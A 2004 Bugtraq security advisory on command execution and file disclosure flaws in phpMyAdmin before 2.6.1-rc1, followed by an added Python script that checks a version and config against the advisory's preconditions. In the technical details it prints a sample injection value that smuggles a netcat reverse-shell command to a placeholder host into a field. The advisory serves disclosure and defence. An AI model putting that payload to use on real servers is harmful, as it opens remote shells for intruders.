
Multiple vulnerabilities in phpMyAdmin

List:       bugtraq
Subject:    Multiple vulnerabilities in phpMyAdmin
From:       Nicolas Gregoire <ngregoire () exaprobe ! com>
Date:       2004-12-13 13:02:09
Message-ID: <1102942929.1530.220.camel () bobby ! exaprobe ! com>

                                Exaprobe
                            www.exaprobe.com

                           Security Advisory

Advisory Name: Multiple vulnerabilities in phpMyAdmin
  Release Date: 13 December 2004
   Application: phpMyAdmin prior to 2.6.1-rc1
      Platform: Any webserver running PHP
      Severity: Remote code execution
        Author: Nicolas Gregoire <ngregoire@exaprobe.com>
Vendor Status: Updated code is available
CVE Candidates: CAN-2004-1147 and CAN-2004-1148
     Reference: www.exaprobe.com/labs/advisories/esa-2004-1213.html


Overview :
==========

phpMyAdmin is a tool written in PHP intended to handle the
administration of MySQL over the Web. Currently it can create and
drop databases, create/drop/alter tables, delete/edit/add fields,
execute any SQL statement, manage keys on fields, manage privileges,
export data into various formats and is available in 47 languages.


Technical details :
===================

Command execution :

- bug introduced in 2.6.0-pl2
- attacker does *not* need access to the phpMyAdmin interface
- PHP safe mode must be off
- external transformations must be activated
- sample of offensive value : F\';nc -e /bin/sh $IP 80;echo \'A

File disclosure :

- attacker needs access to the phpMyAdmin interface
- PHP safe mode must be off
- $cfg['UploadDir'] must be defined
- exploitation is done via 'sql_localfile'


Vendor Response :
=================

After notification by Exaprobe, maintainers of the phpMyAdmin
project have released version 2.6.1-rc1 which fixes these two
vulnerabilities.


Recommendation :
================

Upgrade to 2.6.1-rc1 or newer.
Deactivate uploads and transformations if possible.


CVE Information :
=================

The Common Vulnerabilities and Exposures (CVE) project has assigned
the following names to these issues.  These are candidates for
inclusion in the CVE list (http://cve.mitre.org), which standardizes
names for security problems.

  CAN-2004-1147  Command execution in phpMyAdmin
  CAN-2004-1148  File disclosure in phpMyAdmin

--
Nicolas Gregoire ----- Information Systems Security Consultant
ngregoire@exaprobe.com ------[ ExaProbe ]------ http://www.exaprobe.com/
PGP KeyID:CA61B44F  FingerPrint:1CC647FF1A55664BA2D2AFDACA6A21DACA61B44F
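
Added example (not part of the original advisory and not phpMyAdmin code): a Python check that evaluates the preconditions listed under "Technical details" against an installation's version string and the text of its config.inc.php. The ordering of version suffixes is an assumption, and the safe mode and external transformation states are supplied by the operator rather than detected.

```python
import re

# Suffix ordering is an assumption about phpMyAdmin release naming:
# dev/alpha/beta/rc precede the plain release, "pl" (patch level) follows it.
TAG_RANK = {"dev": -4, "alpha": -3, "beta": -2, "rc": -1, "": 0, "pl": 1}

def version_key(version):
    """Turn '2.6.0-pl2' into a tuple that sorts in release order."""
    m = re.fullmatch(r"(\d+)\.(\d+)\.(\d+)(?:-([a-z]+)(\d*))?", version.strip().lower())
    if not m or (m[4] or "") not in TAG_RANK:
        raise ValueError(f"unrecognised version string: {version!r}")
    return (int(m[1]), int(m[2]), int(m[3]), TAG_RANK[m[4] or ""], int(m[5] or 0))

CMD_INTRODUCED = version_key("2.6.0-pl2")  # from the advisory
FIXED = version_key("2.6.1-rc1")           # from the advisory

def upload_dir(config_text):
    """Return the last non-commented $cfg['UploadDir'] value, or None if unset/empty."""
    text = re.sub(r"/\*.*?\*/", "", config_text, flags=re.S)
    text = re.sub(r"^\s*(//|#).*$", "", text, flags=re.M)
    hits = re.findall(r"""\$cfg\[\s*['"]UploadDir['"]\s*\]\s*=\s*(['"])(.*?)\1\s*;""", text)
    return (hits[-1][1] or None) if hits else None

def assess(version, config_text, safe_mode_on, external_transformations_on):
    """Map each CVE candidate to True when every precondition listed for it holds."""
    v = version_key(version)
    return {
        "CAN-2004-1147": CMD_INTRODUCED <= v < FIXED
                         and not safe_mode_on and external_transformations_on,
        "CAN-2004-1148": v < FIXED and not safe_mode_on
                         and upload_dir(config_text) is not None,
    }

# Constructed sample config.inc.php fragment (not taken from a real install).
SAMPLE_CONFIG = """<?php
// $cfg['UploadDir'] = './old_uploads';
$cfg['UploadDir'] = './upload';
"""

if __name__ == "__main__":
    for ver in ("2.5.7-pl1", "2.6.0-pl3", "2.6.1-rc1"):
        print(ver, assess(ver, SAMPLE_CONFIG, safe_mode_on=False,
                          external_transformations_on=True))
```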
